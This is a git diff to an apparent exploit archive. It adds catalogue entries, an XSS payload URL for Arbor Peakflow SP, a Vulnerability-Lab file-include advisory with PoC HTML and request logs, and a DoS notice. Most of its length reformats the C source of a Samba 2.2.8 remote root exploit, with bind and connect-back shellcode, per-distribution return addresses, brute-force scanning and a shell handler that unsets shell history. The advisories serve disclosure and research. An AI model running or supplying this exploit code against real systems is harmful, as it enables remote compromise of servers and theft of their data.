diff --git a/files.csv b/files.csv index 1a5b9e5a6..ca195f6ab 100755 --- a/files.csv +++ b/files.csv @@ -9,6 +9,7 @@ id,file,description,date,author,platform,type,port 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 +37060,platforms/windows/dos/37060.html,"Internet Explorer 11 - Crash PoC",2015-05-19,Garage4Hackers,windows,dos,0 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 (Linux) - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 @@ -33419,3 +33420,21 @@ id,file,description,date,author,platform,type,port 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0 37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0 +37036,platforms/linux/dos/37036.txt,"Flock 2.6.1 Denial of Service Vulnerability",2012-03-31,r45c4l,linux,dos,0 +37037,platforms/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 'index/' Cross Site Scripting Vulnerability",2012-04-03,b.saleh,hardware,remote,0 +37038,platforms/php/webapps/37038.txt,"osCMax 2.5 admin/login.php username Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37039,platforms/php/webapps/37039.txt,"osCMax 2.5 admin/htaccess.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37040,platforms/php/webapps/37040.txt,"osCMax 2.5 admin/xsell.php search Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37041,platforms/php/webapps/37041.txt,"osCMax 2.5 admin/stats_products_purchased.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37042,platforms/php/webapps/37042.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37043,platforms/php/webapps/37043.txt,"osCMax 2.5 admin/stats_customers.php sorted Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37044,platforms/php/webapps/37044.txt,"osCMax 2.5 admin/information_manager.php information_id Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37045,platforms/php/webapps/37045.txt,"osCMax 2.5 admin/geo_zones.php zID Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 +37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 +37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0 +37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80 +37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 +37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0 diff --git a/platforms/hardware/remote/37037.txt b/platforms/hardware/remote/37037.txt new file mode 100755 index 000000000..97b33805b --- /dev/null +++ b/platforms/hardware/remote/37037.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52881/info + +Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +https://www.example.com/index/"onmouseover="alert(666) \ No newline at end of file diff --git a/platforms/ios/webapps/37057.txt b/platforms/ios/webapps/37057.txt new file mode 100755 index 000000000..1c48f54bc --- /dev/null +++ b/platforms/ios/webapps/37057.txt @@ -0,0 +1,216 @@ +Document Title: +=============== +Wireless Photo Transfer v3.0 iOS - File Include Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1492 + + +Release Date: +============= +2015-05-12 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1492 + + +Common Vulnerability Scoring System: +==================================== +6.5 + + +Product & Service Introduction: +=============================== +Transfer your photo without usb. The best wireless photo transfer app on the App Store. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-12: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Yan Xing +Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application. +The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject +own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. +The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker +is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit +the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack +vector is located on the application-side of the wifi service and the request method to inject is POST. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Submit (Upload) + +Vulnerable Parameter(s): + [+] filename (album-title) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:80/) + + +Proof of Concept (PoC): +======================= +The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: #1 Index File Dir Listing (album-title) + +
+
2 items
+
../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]
+ + +
+
+ + +PoC: #2 Topic Album (Album Title - album_info_intro_driver) + +
+
+
+

../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!](0-2)

+ +
+
+ +
+ Refresh + Download ZIP +
+
+ + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:80/upload.html +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:80/groups] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------8397114799830 +Content-Disposition: form-data; name="upload1"; filename="../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]pentesting.png" +Content-Type: image/png +- +Status: 200[OK] +GET http://localhost:80/ +Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[210] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:80] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[210] + Connection[keep-alive] + Date[Sat, 09 May 2015 15:21:30 GMT] + + + +Reference(s): +http://localhost:80/groups +http://localhost:80/upload.html + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerable album-title value. Encode also the local app input field for sync. +Restrict the filename input and disallow special chars to prevent further arbitrary file upload attacks. Filter and encode also the vulnerable output +values in the mobile wifi interface (file dir) application. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the wifi network interface album-title value is estimated as high. (CVSS 6.5) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/linux/dos/37036.txt b/platforms/linux/dos/37036.txt new file mode 100755 index 000000000..7d37d69ef --- /dev/null +++ b/platforms/linux/dos/37036.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52856/info + +Flock is prone to a denial-of-service vulnerability. + +Successful exploits will consume excessive resources and will eventually crash the application and possibly the underlying computer, effectively denying service to legitimate users. + +Flock 2.6.1 is vulnerable; other versions may also be affected. + + diff --git a/platforms/linux/remote/10.c b/platforms/linux/remote/10.c index d95b1baaf..f25063ad7 100755 --- a/platforms/linux/remote/10.c +++ b/platforms/linux/remote/10.c @@ -92,8 +92,7 @@ pid_t childs[100]; struct sockaddr_in addr1; struct sockaddr_in addr2; -char -linux_bindcode[] = +char linux_bindcode[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" @@ -108,8 +107,7 @@ linux_bindcode[] = "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; -char -bsd_bindcode[] = +char bsd_bindcode[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" @@ -124,8 +122,7 @@ bsd_bindcode[] = "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; -char -linux_connect_back[] = +char linux_connect_back[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" @@ -136,8 +133,7 @@ linux_connect_back[] = "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; -char -bsd_connect_back[] = +char bsd_connect_back[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" @@ -153,52 +149,30 @@ struct { char *type; unsigned long ret; char *shellcode; - int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec -stack */ + int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */ } targets[] = { - { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, -0 }, - { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, - 0 }, - { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, -0 }, - { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, - 0 }, - { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, -0 }, - { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, -0 }, - { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, -0 }, - { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, - 0 }, - { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, -0 }, - { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, - 0 }, - { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, -1 }, - { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, -1 }, - { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, -1 }, - { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, - 1 }, - { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, -2 }, - { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, - 2 }, - { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, - 2 }, - { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, - 2 }, - { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, -0 }, + { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 }, + { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 }, + { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 }, + { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 }, + { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 }, + { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 }, + { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 }, + { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 }, + { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 }, + { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 }, + { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 }, + { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 }, + { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 }, + { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 }, + { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 }, + { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 }, + { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 }, + { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 }, }; void shell(); @@ -213,18 +187,14 @@ int start_session(int sock); int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); -void -usage(char *prog) +void usage(char *prog) { fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" - "-b bruteforce (0 = Linux, 1 = FreeBSD/Net -BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" + "-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" "-B bruteforce steps (default = 300)\n" "-c connectback ip address\n" - "-C max childs for scan/bruteforce mode (d -efault = 40)\n" - "-d bruteforce/scanmode delay in micro sec -onds (default = 100000)\n" + "-C max childs for scan/bruteforce mode (default = 40)\n" + "-d bruteforce/scanmode delay in micro seconds (default = 100000)\n" "-f force\n" "-p port to attack (default = 139)\n" "-r return address\n" @@ -236,8 +206,7 @@ onds (default = 100000)\n" exit(1); } -int -is_samba(char *ip, unsigned long time_out) +int is_samba(char *ip, unsigned long time_out) { char nbtname[]= /* netbios name packet */ @@ -290,10 +259,8 @@ is_samba(char *ip, unsigned long time_out) ptr -= 19; - if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & -& *(ptr + 3) == 0x00 && - *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 & -& *(ptr + 6) == 0x00) { + if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 && + *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) { close(s); return 0; } @@ -310,8 +277,7 @@ is_samba(char *ip, unsigned long time_out) return -1; } -int -Connect(int fd, char *ip, unsigned int port, unsigned int time_out) +int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ @@ -360,8 +326,7 @@ Connect(int fd, char *ip, unsigned int port, unsigned int time_out) } - select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti -meout); + select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); if(select_status == 0) { close(fd); @@ -379,8 +344,7 @@ meout); { getsockopt_length = sizeof(getsockopt_error); - if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err -or, &getsockopt_length) < 0) { + if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; @@ -414,8 +378,7 @@ or, &getsockopt_length) < 0) { return 1; } -int -read_timer(int fd, unsigned int time_out) +int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ @@ -468,8 +431,7 @@ read_timer(int fd, unsigned int time_out) } } -int -write_timer(int fd, unsigned int time_out) +int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ @@ -520,12 +482,10 @@ write_timer(int fd, unsigned int time_out) } -void -shell(int sock) +void shell(int sock) { fd_set fd_read; - char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE -\";uname -a;id;\n"; + char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n"; int n; FD_ZERO(&fd_read); @@ -567,8 +527,7 @@ shell(int sock) exit(0); } -void -handler() +void handler() { int sock = 0; int i = 0; @@ -584,8 +543,7 @@ handler() if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { fprintf(stdout, "+ Worked!\n" - "---------------------------------------------- -----------------\n"); + "--------------------------------------------------------------\n"); shell(sock); close(sock); } @@ -593,17 +551,13 @@ handler() } -int -start_session(int sock) +int start_session(int sock) { char buffer[1000]; char response[4096]; - char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 -\x00\x00\x00"; - char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 -\x6e\x6f\x62\x6f\x64\x79" - "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24 -"; + char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; + char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" + "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; @@ -628,8 +582,7 @@ start_session(int sock) smbheader->uid = 100; smbheader->mid = 0x01; - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da -ta1, sizeof(session_data1) - 1); + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; @@ -642,8 +595,7 @@ ta1, sizeof(session_data1) - 1); netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); - if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess -ion message\n"); + if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); @@ -663,8 +615,7 @@ ion message\n"); smbheader->tid = 0x00; smbheader->uid = 100; - memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da -ta2, sizeof(session_data2) - 1); + memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; @@ -682,18 +633,14 @@ ta2, sizeof(session_data2) - 1); return 0; } -int -exploit_normal(int sock, unsigned long ret, char *shellcode) +int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00" - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x -00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00\x00" + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; @@ -719,8 +666,7 @@ exploit_normal(int sock, unsigned long ret, char *shellcode) smbheader->tid = 0x01; smbheader->uid = 100; - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex -ploit_data), 0x90, 3000); + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; @@ -742,18 +688,14 @@ ploit_data), 0x90, 3000); return -1; } -int -exploit_openbsd32(int sock, unsigned long ret, char *shellcode) +int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = - "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00" - "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x -00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x -00\x00\x00\x00" + "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; @@ -778,8 +720,7 @@ exploit_openbsd32(int sock, unsigned long ret, char *shellcode) smbheader->tid = 0x01; smbheader->uid = 100; - memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex -ploit_data), 0x90, 3000); + memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); @@ -789,8 +730,7 @@ ploit_data), 0x90, 3000); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); - memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) -; + memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; @@ -801,8 +741,7 @@ ploit_data), 0x90, 3000); } -int -main (int argc,char *argv[]) +int main (int argc,char *argv[]) { char *shellcode = NULL; char scan_ip[256]; @@ -832,10 +771,8 @@ main (int argc,char *argv[]) struct hostent *he; - fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric -.org|be)\n" - "------------------------------------------------------ ---------\n"); + fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n" + "--------------------------------------------------------------\n"); while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { switch(opt) @@ -843,8 +780,7 @@ main (int argc,char *argv[]) case 'b': brute = atoi(optarg); if ((brute < 0) || (brute > 3)) { - fprintf(stderr, "Invalid platform.\n\n" -); + fprintf(stderr, "Invalid platform.\n\n"); return -1; } break; @@ -853,38 +789,29 @@ main (int argc,char *argv[]) if (STEPS == 0) STEPS++; break; case 'c': - sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, - &ip4); + sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); connectback = 1; - if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == -0) { - fprintf(stderr, "Invalid IP address.\n\ -n"); + if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { + fprintf(stderr, "Invalid IP address.\n\n"); return -1; } - linux_connect_back[33] = ip1; bsd_connect_back[ -24] = ip1; - linux_connect_back[34] = ip2; bsd_connect_back[ -25] = ip2; - linux_connect_back[35] = ip3; bsd_connect_back[ -26] = ip3; - linux_connect_back[36] = ip4; bsd_connect_back[ -27] = ip4; + linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1; + linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2; + linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3; + linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4; break; case 'C': MAX_CHILDS = 